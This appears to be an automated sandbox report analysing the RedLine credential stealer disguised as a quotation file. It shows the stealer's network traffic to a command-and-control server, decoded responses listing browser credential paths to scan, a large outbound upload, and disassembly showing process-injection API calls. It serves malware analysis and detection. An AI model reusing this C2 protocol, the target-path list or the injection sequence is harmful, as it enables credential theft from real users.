                                                                                      May 26, 2022 02:33:03.378009081 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.378134012 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.378257990 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.378496885 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.378699064 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.378914118 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.379219055 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.439538956 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:03.674890041 CEST4975217910192.168.2.3185.222.58.90
                                                                                      May 26, 2022 02:33:03.697710037 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.065439939 CEST4975217910192.168.2.3185.222.58.90
                                                                                      May 26, 2022 02:33:04.088551044 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.091442108 CEST4975217910192.168.2.3185.222.58.90
                                                                                      May 26, 2022 02:33:04.114459991 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.114557981 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.114603996 CEST4975217910192.168.2.3185.222.58.90
                                                                                      May 26, 2022 02:33:04.114650965 CEST4975217910192.168.2.3185.222.58.90
                                                                                      May 26, 2022 02:33:04.137609005 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.137653112 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.137681007 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.137752056 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.168078899 CEST1791049752185.222.58.90192.168.2.3
                                                                                      May 26, 2022 02:33:04.378088951 CEST4975217910192.168.2.3185.222.58.90
                                                                                      May 26, 2022 02:33:04.499082088 CEST4975217910192.168.2.3185.222.58.90

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      May 26, 2022 02:32:39.698916912 CEST5641753192.168.2.38.8.8.8
                                                                                      May 26, 2022 02:32:39.729419947 CEST5592353192.168.2.38.8.8.8

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      May 26, 2022 02:32:39.698916912 CEST192.168.2.38.8.8.80x99Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                      May 26, 2022 02:32:39.729419947 CEST192.168.2.38.8.8.80xae6fStandard query (0)api.ip.sbA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      May 26, 2022 02:32:39.719505072 CEST8.8.8.8192.168.2.30x99No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                      May 26, 2022 02:32:39.750528097 CEST8.8.8.8192.168.2.30xae6fNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • 185.222.58.90:17910

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.349740185.222.58.9017910C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      May 26, 2022 02:32:32.181452990 CEST1141OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                      Host: 185.222.58.90:17910
                                                                                      Content-Length: 137
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Connection: Keep-Alive
                                                                                      May 26, 2022 02:32:32.205427885 CEST1141INHTTP/1.1 100 Continue
                                                                                      May 26, 2022 02:32:32.230887890 CEST1142INHTTP/1.1 200 OK
                                                                                      Content-Length: 212
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 25 May 2022 22:32:31 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                      May 26, 2022 02:32:39.199033976 CEST1214OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                      Host: 185.222.58.90:17910
                                                                                      Content-Length: 144
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      May 26, 2022 02:32:39.223392010 CEST1214INHTTP/1.1 100 Continue
                                                                                      May 26, 2022 02:32:39.278840065 CEST1216INHTTP/1.1 200 OK
                                                                                      Content-Length: 4744
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 25 May 2022 22:32:38 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.349751185.222.58.9017910C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      May 26, 2022 02:33:02.683155060 CEST1246OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                      Host: 185.222.58.90:17910
                                                                                      Content-Length: 1137724
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      May 26, 2022 02:33:02.707374096 CEST1246INHTTP/1.1 100 Continue
                                                                                      May 26, 2022 02:33:03.070012093 CEST2465INHTTP/1.1 200 OK
                                                                                      Content-Length: 147
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 25 May 2022 22:33:02 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.349752185.222.58.9017910C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      May 26, 2022 02:33:03.106812954 CEST2466OUTPOST / HTTP/1.1
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                      Host: 185.222.58.90:17910
                                                                                      Content-Length: 1137716
                                                                                      Expect: 100-continue
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Connection: Keep-Alive
                                                                                      May 26, 2022 02:33:03.129657030 CEST2466INHTTP/1.1 100 Continue
                                                                                      May 26, 2022 02:33:04.168078899 CEST3648INHTTP/1.1 200 OK
                                                                                      Content-Length: 261
                                                                                      Content-Type: text/xml; charset=utf-8
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Wed, 25 May 2022 22:33:03 GMT
                                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:02:32:07
                                                                                      Start date:26/05/2022
                                                                                      Path:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe"
                                                                                      Imagebase:0x1300000
                                                                                      File size:632320 bytes
                                                                                      MD5 hash:2A348D2B6798A26F0FB552108CB870FB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:02:32:13
                                                                                      Start date:26/05/2022
                                                                                      Path:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      Imagebase:0x1300000
                                                                                      File size:632320 bytes
                                                                                      MD5 hash:2A348D2B6798A26F0FB552108CB870FB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.362585118.000000000326F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.257515247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.257515247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.361370195.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.361370195.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.257103376.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.257103376.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:02:32:16
                                                                                      Start date:26/05/2022
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7c9170000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:19.8%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:12.7%
                                                                                        Total number of Nodes:166
                                                                                        Total number of Limit Nodes:22
                                                                                        execution_graph 15906 1258ee8 15907 1258f2d SetThreadContext 15906->15907 15909 1258f75 15907->15909 16088 1255338 16089 125534a 16088->16089 16091 c26ab7 6 API calls 16089->16091 16092 c26ac8 6 API calls 16089->16092 16090 1255363 16091->16090 16092->16090 16093 1256518 16094 1256560 SetKernelObjectSecurity 16093->16094 16096 12565a5 16094->16096 16097 1259358 16098 1259398 ResumeThread 16097->16098 16100 12593c9 16098->16100 16101 1259298 16102 12592d8 VirtualAllocEx 16101->16102 16104 1259315 16102->16104 15910 c26a8d 15911 c26a9a 15910->15911 15915 c26ab7 15911->15915 15919 c26ac8 15911->15919 15912 c26ab4 15916 c26adb 15915->15916 15923 c26b01 15916->15923 15920 c26adb 15919->15920 15922 c26b01 6 API calls 15920->15922 15921 c26aec 15921->15912 15922->15921 15924 c26b3a 15923->15924 15925 c26aec 15924->15925 15928 c28340 15924->15928 15932 c28330 15924->15932 15925->15912 15929 c28367 15928->15929 15936 c29a78 15929->15936 15933 c28367 15932->15933 15935 c29a78 6 API calls 15933->15935 15934 c283a4 15934->15925 15935->15934 15937 c29ab8 15936->15937 15938 c29d0f 15937->15938 15943 c2a380 15937->15943 15947 c2a599 15937->15947 15951 c2a328 15937->15951 15956 c2a370 15937->15956 15944 c2a393 15943->15944 15945 c2a3c3 15944->15945 15961 c2a5db 15944->15961 15945->15938 15948 c2a5ab 15947->15948 15949 c2a41f 15947->15949 15948->15938 15949->15947 15950 c2a5db 6 API calls 15949->15950 15950->15949 15952 c2a32e 15951->15952 15953 c2a393 15951->15953 15952->15938 15954 c2a3c3 15953->15954 15955 c2a5db 6 API calls 15953->15955 15954->15938 15955->15953 15958 c2a338 15956->15958 15959 c2a37b 15956->15959 15957 c2a3c3 15957->15938 15958->15938 15959->15957 15960 c2a5db 6 API calls 15959->15960 15960->15959 15962 c2a5ef 15961->15962 15963 c2a65f 15962->15963 15967 c2e920 15962->15967 15971 c2da08 15962->15971 15978 c2db88 15962->15978 15963->15944 15968 c2e944 15967->15968 15970 c2e99c 15967->15970 15968->15970 15987 c2ef30 15968->15987 15970->15962 15972 c2da36 15971->15972 15975 c2daf2 15971->15975 15973 c2daf4 15972->15973 15972->15975 15976 c2da9a 15972->15976 15974 c2a380 6 API calls 15973->15974 15974->15975 15975->15962 15977 c2a380 6 API calls 15976->15977 15977->15975 15979 c2dbb6 15978->15979 15981 c2dc7c 15979->15981 15982 c2dd25 15979->15982 15986 c2ddff 15979->15986 15980 c2df5f 15980->15962 15981->15962 15983 c2a380 6 API calls 15982->15983 15984 c2ddee 15983->15984 15984->15962 15985 c2a380 6 API calls 15985->15980 15986->15980 15986->15985 15988 c2ef9f 15987->15988 15989 c2ef5e 15987->15989 15990 c2f010 15988->15990 15998 12518f8 15988->15998 16007 12516f8 15988->16007 16016 12514e8 15988->16016 16025 12514d9 15988->16025 16034 1251a80 15988->16034 16043 12517a0 15988->16043 15991 c2ef30 6 API calls 15989->15991 15990->15970 15991->15988 15999 125192e 15998->15999 16000 1251a58 15999->16000 16052 dd038d 15999->16052 16058 dd1200 15999->16058 16064 dd09a0 15999->16064 16070 dd11e1 15999->16070 16076 dd0981 15999->16076 16082 dd03a8 15999->16082 16000->15990 16008 1251704 16007->16008 16009 125172c 16008->16009 16010 dd038d 2 API calls 16008->16010 16011 dd03a8 2 API calls 16008->16011 16012 dd0981 2 API calls 16008->16012 16013 dd11e1 2 API calls 16008->16013 16014 dd09a0 2 API calls 16008->16014 16015 dd1200 2 API calls 16008->16015 16009->15990 16010->16009 16011->16009 16012->16009 16013->16009 16014->16009 16015->16009 16017 1251516 16016->16017 16018 12516cc 16017->16018 16019 dd038d 2 API calls 16017->16019 16020 dd03a8 2 API calls 16017->16020 16021 dd0981 2 API calls 16017->16021 16022 dd11e1 2 API calls 16017->16022 16023 dd09a0 2 API calls 16017->16023 16024 dd1200 2 API calls 16017->16024 16018->15990 16019->16018 16020->16018 16021->16018 16022->16018 16023->16018 16024->16018 16026 12514e8 16025->16026 16027 12516cc 16026->16027 16028 dd038d 2 API calls 16026->16028 16029 dd03a8 2 API calls 16026->16029 16030 dd0981 2 API calls 16026->16030 16031 dd11e1 2 API calls 16026->16031 16032 dd09a0 2 API calls 16026->16032 16033 dd1200 2 API calls 16026->16033 16027->15990 16028->16027 16029->16027 16030->16027 16031->16027 16032->16027 16033->16027 16035 1251abe 16034->16035 16036 1251b38 16035->16036 16037 dd038d 2 API calls 16035->16037 16038 dd03a8 2 API calls 16035->16038 16039 dd0981 2 API calls 16035->16039 16040 dd11e1 2 API calls 16035->16040 16041 dd09a0 2 API calls 16035->16041 16042 dd1200 2 API calls 16035->16042 16036->15990 16037->16036 16038->16036 16039->16036 16040->16036 16041->16036 16042->16036 16045 12517ab 16043->16045 16044 12518c6 16044->15990 16045->16044 16046 dd038d 2 API calls 16045->16046 16047 dd03a8 2 API calls 16045->16047 16048 dd0981 2 API calls 16045->16048 16049 dd11e1 2 API calls 16045->16049 16050 dd09a0 2 API calls 16045->16050 16051 dd1200 2 API calls 16045->16051 16046->16044 16047->16044 16048->16044 16049->16044 16050->16044 16051->16044 16053 dd0514 16052->16053 16054 dd03d8 16052->16054 16053->16000 16054->16053 16056 1255af0 VirtualProtect 16054->16056 16057 1255ae8 VirtualProtect 16054->16057 16055 dd0505 16055->16000 16056->16055 16057->16055 16059 dd1409 16058->16059 16060 dd1230 16058->16060 16059->16000 16060->16059 16062 12590f0 WriteProcessMemory 16060->16062 16063 12590e9 WriteProcessMemory 16060->16063 16061 dd13fa 16061->16000 16062->16061 16063->16061 16065 dd0d4e 16064->16065 16066 dd09d3 16064->16066 16065->16000 16066->16065 16068 1258b54 CreateProcessA 16066->16068 16069 1258b60 CreateProcessA 16066->16069 16067 dd0d3f 16067->16000 16068->16067 16069->16067 16071 dd1409 16070->16071 16072 dd1230 16070->16072 16071->16000 16072->16071 16074 12590f0 WriteProcessMemory 16072->16074 16075 12590e9 WriteProcessMemory 16072->16075 16073 dd13fa 16073->16000 16074->16073 16075->16073 16077 dd0d4e 